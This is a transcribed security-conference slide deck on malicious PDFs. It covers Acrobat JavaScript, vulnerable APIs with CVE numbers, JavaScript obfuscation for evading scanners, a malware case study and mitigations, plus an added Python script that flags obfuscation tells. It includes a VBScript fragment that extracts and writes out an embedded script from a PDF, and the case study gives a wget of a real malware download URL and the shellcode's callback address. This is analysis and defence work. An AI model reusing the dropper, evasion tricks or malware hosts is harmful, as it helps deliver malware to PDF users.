    • Set fso=CreateObject("Scripting.FileSystemObject")
    • Set f=fso.OpenTextFile("EmbeddedExePoC.pdf", 1, True)
    • pf=f.ReadAll
    • s=InStr(pf,"'SS")
    • e=InStr(pf,"'EE")
    • s=Mid(pf,s,e-s)
    • Set z=fso.OpenTextFile("toexecute.vbs", 2, True)
    • s = Replace(s,"%","")
    • s = Replace(s,";",vbcrlf)
    • z.Write(s)
  37. AcroJS
    • AcroJS API
    • Vulnerable APIs
    • Obfuscation Techniques
    • Case Study
  38. AcroJS
    • Acrobat JavaScript is the cross-platform scripting language of the Adobe® Acrobat® family of products.
    • Through JavaScript extensions, the viewer application and its plug-ins expose much of their functionality to document authors, form designers, and plug-in developers.
    • This functionality includes the following features:
      • Processing forms within the document
      • Batch processing collections of PDF documents
      • Developing and maintaining online collaboration schemes
      • Communicating with local databases
      • Controlling multimedia events
  39. JavaScript Actions
    • A JavaScript action causes a script to be compiled and executed by the JavaScript interpreter.
    • Depending on the nature of the script, various interactive form fields in the document may update their values or change their visual appearances.
    • PARAMETERS
    • /S
    • Type – name
    • (Required) The type of action that this dictionary describes; must be JavaScript for a JavaScript action.
    • /JS
    • Type – text string or text stream
    • (Required) A text string or text stream containing the JavaScript script to be executed.
  40. AcroJS examples: launchURL, alert box
  41. AcroJS examples
  42. AcroJS examples
  43. Vulnerable APIs
    • getIcon() [CVE-2009-0927]
      • Stack-based buffer overflow in Adobe Reader and Adobe Acrobat 9 before 9.1, 8 before 8.1.3 , and 7 before 7.1.1 allows remote attackers to execute arbitrary code via a crafted argument to the getIcon method of a Collab object, a different vulnerability than CVE-2009-0658.
    • util.printf() [CVE-2008-2992][CVE-2008-1104]
      • Stack-based buffer overflow in Adobe Acrobat and Reader 8.1.2 and earlier allows remote attackers to execute arbitrary code via a PDF file that calls the util.printf JavaScript function with a crafted format string argument, a related issue to CVE-2008-1104.
      • Stack-based buffer overflow in Foxit Reader before 2.3 build 2912 allows user-assisted remote attackers to execute arbitrary code via a crafted PDF file, related to the util.printf JavaScript function and floating point specifiers in format strings.
  44. Vulnerable APIs
    • getAnnots() [CVE-2009-1492]
      • The getAnnots Doc method in the JavaScript API in Adobe Reader and Acrobat 9.1, 8.1.4, 7.1.1, and earlier allows remote attackers to cause a denial of service (memory corruption) or execute arbitrary code via a PDF file that contains an annotation, and has an OpenAction entry with JavaScript code that calls this method with crafted integer arguments.
    • customDictionaryOpen() [CVE-2009-1493]
      • The customDictionaryOpen spell method in the JavaScript API in Adobe Reader 9.1, 8.1.4, 7.1.1, and earlier on Linux and UNIX allows remote attackers to cause a denial of service (memory corruption) or execute arbitrary code via a PDF file that triggers a call to this method with a long string in the second argument.
  45. Vulnerable APIs
    • Doc.media.newPlayer [CVE-2009-4324]
      • Use-after-free vulnerability in the Doc.media.newPlayer method in Multimedia.api in Adobe Reader and Acrobat 9.x before 9.3, and 8.x before 8.2 on Windows and Mac OS X, allows remote attackers to execute arbitrary code via a crafted PDF file using ZLib compressed streams, as exploited in the wild in December 2009.
    • Collab.collectEmailInfo [CVE-2007-5659]
      • Multiple buffer overflows in Adobe Reader and Acrobat 8.1.1 and earlier allow remote attackers to execute arbitrary code via a PDF file with long arguments to unspecified JavaScript methods. NOTE: this issue might be subsumed by CVE-2008-0655.
  46. Obfuscation Techniques
    • Why?
      • To make analysis more difficult
      • To avoid detection by virus scanners
    • Ways?
      • Using JavaScript obfuscation
      • Using PDF obfuscation (filters)
  47. JavaScript Obfuscation: Unlearn Coding Ethics
  48. Distorting format
    • Normal Code:
      • function execute(data, time) {
      •   Timelag=5000;
      •   if (time > Timelag) {
      •     // some code
      •   }
      • }
      • function overflow(hex, loop) {
      •   for (i=0;i<loop;i++) {
      •     hex = hex + hex;
      •   }
      • }
    • Obfuscated Code:
      • function overflow(hex, loop){for (i=0;i<loop;i++){hex = hex + hex;}}
      • function overflow(hex, loop) {for (i=0;i<loop;i++){hex = hex + hex;} }
  49. Obfuscating Identifiers
    • Normal Code: the same execute and overflow functions as on slide 48
    • Obfuscated Code:
      • function aeiou(lIlIIlI, O0OOOO0OO000OO) {
      •   WWMWMMWMWMWMW=5000;
      •   if (O0OOOO0OO000OO > WWMWMMWMWMWMW) {
      •     // some code
      •   }
      • }
      • function aimpq(xxwmnnx, pqrtxw) {
      •   for (dqweaa=0; dqweaa < pqrtxw; dqweaa ++) {
      •     xxwmnnx = xxwmnnx + xxwmnnx;
      •   }
      • }
  50. Obfuscating Identifiers – Even Worse
    • Differentiating with the number of underscore characters
      • function _____(____,__________) {
      •   ______________=5000;
      •   if (__________>______________) {
      •     // some code
      •   }
      • }
      • function ___(_______, ______) {
      •   for(________________=0; ________________<______; ________________ ++) {
      •     _______ = _______ + _______;
      •   }
      • }
  51. Obfuscating Identifiers – Even Worse
    • Differentiating with the number of underscore characters, with the formatting distorted as well
      • function _____(____,__________){______________=5000;if (__________>______________){/* some code */}}function ___(_______, ______){for(________________=0; ________________<______; ________________ ++){_______ = _______ + _______;}}
  52. Chain of Eval
    • Normal Code:
      • app.alert("c0c0n");
    • Obfuscated Code:
      • func=eval; one='app.alert("c0c0n")'; two=eval(one); three=eval(two); eval(func(three));
  53. Splitting JavaScript
    • Normal Code:
      • app.alert("hello world");
    • Obfuscated Code:
      • Rt=");"; Td='ert("hel'; Ab="ap"; Qw='ld"'; Kg="p.al"; Gh="lo wor";
      • eval("hh=Ab+Kg+Td+Gh+Qw+Rt");
      • eval(hh);
  54. Callee Trick
    • The function accesses its own source and uses it as a key to decrypt code or data
      • function decrypt(cypher) {
      •   var key = arguments.callee.toString();
      •   for (var i = 0; i < cypher.length; i++) {
      •     plain = key.charCodeAt(i) ^ cypher.charCodeAt(i);
      •   }
      •   …
      • }
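The obfuscation tells of slides 47-54 and the risky API list of slides 43-45 turned into a triage script for a deobfuscated AcroJS snippet, as an added Python example that is not part of the deck; the sample inputs are the deck's own snippets re-typed inline, and the score is a constructed heuristic, not a verdict.

```python
import re

# Methods the slides list as historically vulnerable (slides 43-45).
RISKY_CALLS = ("util.printf", "getIcon", "getAnnots", "customDictionaryOpen",
               "media.newPlayer", "collectEmailInfo")
IDENT_RE = re.compile(r"\b[A-Za-z_$][\w$]*\b")
EVAL_RE = re.compile(r"\beval\s*\(")
# eval fed an assignment that glues several variables together ('Splitting JavaScript')
CONCAT_EVAL_RE = re.compile(r"\beval\s*\(\s*[\"']?\s*\w+\s*=\s*\w+(?:\s*\+\s*\w+){2,}")


def odd_identifier(name):
    """Names built from underscores only, or from at most two glyphs
    (lIlIIlI, O0OOOO0OO000OO, WWMWMMWMWMWMW), as on the identifier slides."""
    return bool(re.fullmatch(r"_+", name)) or (len(name) >= 5 and len(set(name.lower())) <= 2)


def obfuscation_report(js):
    """Count the obfuscation tells the slides describe plus any call to a risky API.
    'score' is how many of the five tell families fired: a triage hint, not a verdict."""
    evals = len(EVAL_RE.findall(js))
    report = {
        "eval_calls": evals,
        # 'Chain of Eval': several evals, or eval reached through its name as a string
        "eval_chain": evals >= 2 or bool(re.search(r"[\"']eval[\"']", js)),
        "split_strings": bool(CONCAT_EVAL_RE.search(js)),
        "callee_trick": "arguments.callee" in js,
        "odd_identifiers": sorted({i for i in IDENT_RE.findall(js) if odd_identifier(i)}),
        "risky_calls": [c for c in RISKY_CALLS if c in js],
    }
    report["score"] = sum((report["eval_chain"], report["split_strings"], report["callee_trick"],
                           bool(report["odd_identifiers"]), bool(report["risky_calls"])))
    return report


# Constructed inputs: the deck's own obfuscated snippets (slides 49, 52-54) plus one benign line.
SAMPLES = {
    "plain": 'app.alert("hello world");',
    "identifiers": ("function aeiou(lIlIIlI, O0OOOO0OO000OO) { WWMWMMWMWMWMW=5000; "
                    "if (O0OOOO0OO000OO > WWMWMMWMWMWMW) { /* some code */ } }"),
    "chain": 'func=eval; one=\'app.alert("c0c0n")\'; two=eval(one); three=eval(two); eval(func(three));',
    "split": ('Rt=");"; Td=\'ert("hel\'; Ab="ap"; Qw=\'ld"\'; Kg="p.al"; Gh="lo wor"; '
              'eval("hh=Ab+Kg+Td+Gh+Qw+Rt"); eval(hh);'),
    "callee": ("function decrypt(cypher) { var key = arguments.callee.toString(); "
               "for (var i = 0; i < cypher.length; i++) { plain = key.charCodeAt(i) ^ cypher.charCodeAt(i); } }"),
}

if __name__ == "__main__":
    for name, js in SAMPLES.items():
        print(name, obfuscation_report(js))
```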
  55. PDF obfuscation
    • Using filters for streams.
    • Most common encoding techniques:
      • ASCIIHEXDecode,
      • ASCII85Decode,
      • LZWDecode,
      • FlateDecode,
      • RunLengthDecode
  56. Case Study
    • Malware found from – www.malwaredomainlist.com
    • File link: www.bigiqwars.ru/ppp/exp/pdf.php?user=admin&pdf_acces=on
    • Added on – 29 July 2010
  57. VirusTotal report: 5/42 (11.90%)
    • Analysis
  58. STEP-1
    • wget www.bigiqwars.ru/ppp/exp/pdf.php?user=admin&pdf_acces=on
  59. STEP-2
    • Behavioral Analysis
    • Environment
    • Using a VM image
    • Filemon, Procmon, Regmon, TCPView
    • Results
    • The process ‘AcroRd32.exe’ was trying to connect to the remote site http://bigiqwars.ru/ppp/exe.php?spl=PDF (newPlayer)&user=admin&exe_acces=on
  60. STEP-3
    • pdfid.py
  61. STEP-4
    • Static/Code Analysis
  62. Word Editor
  63. Decoded the script
  64. Formatted using jsbeautifier.org
  65. Replacing with meaningful identifiers and removing unnecessary comments
    • Replacing ‘X’ from parameter
  66. Shellcode Analysis
    • Connecting to… http://bigiqwars.ru/ppp/exe.php?spl=PDF (newPlayer)&user=admin&exe_acces=on
  67. Road Ahead
    • Mitigations
    • Adobe’s security Measures
    • Future Exploit methods
  68. How can we protect ourselves
    • Enable automatic updates: it sounds simple, but you need to turn it on in the software settings to make it happen by default.
    • Disable PDF browser integration: most browsers will open PDFs without asking, so an infected PDF can deliver its payload in the background without warning.
    • Always install the latest patch/update, even for older Adobe product versions.
    • Disable JavaScript.
    • Uncheck ‘Allow non-PDF file attachments with external applications’ to prevent the launch action vulnerability.
    • PDF alternatives such as Foxit are worthwhile, as long as auto-updates are turned on; however, alternative programs become just as vulnerable to malware as they gain popularity.
  69. Road Ahead
    • Less focus on JavaScript exploits
    • Attackers focusing more on embedded objects inside PDFs, i.e. Flash
    • Adobe to introduce sandboxing to limit Reader exploits
  70. Tools And References
  71. Tools used
    • Malzilla
    • Mozilla add-on
      • JavaScript Deobfuscator by Wladimir Palant
    • VMware Player
    • Sysinternals tools
      • Procmon, Filemon, Regmon, TCPView
    • WinHex
    • HexEdit
  72. Thank you
    • Hakers.info